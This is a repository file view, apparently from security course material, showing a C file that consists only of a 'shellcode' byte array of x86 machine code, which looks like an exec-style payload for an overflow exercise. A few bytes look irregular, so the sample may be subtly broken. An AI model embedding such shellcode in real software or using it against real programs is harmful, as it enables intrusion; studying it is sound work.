progs/o2.c
author cu
Sun, 15 Oct 2017 21:23:16 +0100
changeset 550 58c3536c5a08
parent 400 f05368d007dd
permissions -rw-r--r--
updated

char shellcode[] =
 "\x55\x89\xe5\x83\xec\x14\xc7\x45\xf8\xc0\x84\x04"
 "\x08\xc7\x45\xfc\x00\x00\x00\x00\x00\x8d\x55\xf8"
 "\x89\x54\x24\x04\x89\x04\x34\xe8\x02\xff\xff\xff"
 "\xc9\xc3";